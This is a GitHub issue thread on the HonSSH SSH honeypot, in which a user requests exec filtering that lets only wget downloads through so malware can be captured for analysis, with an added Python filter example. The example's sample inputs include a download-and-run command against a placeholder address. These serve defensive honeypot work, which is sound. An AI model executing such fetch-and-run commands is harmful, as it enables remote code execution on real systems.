tnich/honssh

Question about a possible feature

mchaos opened this issue · 2 comments

I have found my own rudimentary way of doing this. So I am sure you are aware that allowing exec remote commands results in a bunch of malware running on the server within an hour typically. This causes me to weed it out, which is not hard, but time consuming, and constant. I still would like to capture the malware for dissection and execution in a vm to figure out how to remove and defend against.

There should be a way to enable exec, however only letting the wget command pass through, with the rest recorded to the log but not actually executed. This would allow anyone to collect malware in the wild to see what is out there.

It would also make it very easy to find where the buggers are connecting to.

I'd love to see this. For now I have a quick and dirty way on the server itself to make it so that over exec connections the malware will be downloaded, but that's it.
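The filter requested above, as an added example that is not part of the original post and is not HonSSH's implementation: it decides whether an SSH exec request is a single plain wget download that may pass through, or should be recorded only. The function name `classify_exec`, the option allow-list and the sample commands are assumptions made for illustration; checking only that the string starts with `wget` would also pass chained commands such as `wget ...; sh ...`, which is the case the metacharacter check handles.

```python
import shlex

# Characters that let a shell chain, substitute or redirect. Any of them
# means the request is more than one plain wget invocation.
SHELL_META = set(";&|`$<>(){}\\\n")
# Assumed policy: only options that cannot run a program or pick an output
# path. Options such as -e/--execute and -O are logged, not passed.
SAFE_OPTIONS = {"-q", "--quiet", "-c", "--continue", "-nv", "--no-verbose"}
URL_SCHEMES = ("http://", "https://", "ftp://")


def classify_exec(command):
    """Return ("pass", argv) for a lone wget download, else ("log_only", reason)."""
    if any(ch in SHELL_META for ch in command):
        return ("log_only", "shell metacharacter")
    try:
        argv = shlex.split(command)
    except ValueError:
        return ("log_only", "unbalanced quoting")
    # Bare command name only: a path such as ./wget could be attacker-supplied.
    if not argv or argv[0] != "wget":
        return ("log_only", "not a wget command")
    urls = []
    for arg in argv[1:]:
        if arg.startswith("-"):
            if arg not in SAFE_OPTIONS:
                return ("log_only", "option not allowed: " + arg)
        elif arg.lower().startswith(URL_SCHEMES):
            urls.append(arg)
        else:
            return ("log_only", "argument is not a URL: " + arg)
    if not urls:
        return ("log_only", "no URL given")
    # Hand argv to the executor as a list, never as a shell string.
    return ("pass", argv)


if __name__ == "__main__":
    # Constructed sample exec requests (documentation-range address).
    samples = [
        "wget -q http://198.51.100.7/bot.sh",
        "wget http://198.51.100.7/bot.sh; sh bot.sh",
        "wget -e robots=off http://198.51.100.7/bot.sh",
        "uname -a",
    ]
    for s in samples:
        print(classify_exec(s), "<-", s)
```

Every request, passed or not, would still be written to the session log, so the download URLs remain available even when the command is not executed.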

tnich commented

Nice idea, I'll add it to the list

tnich commented

Added in the latest release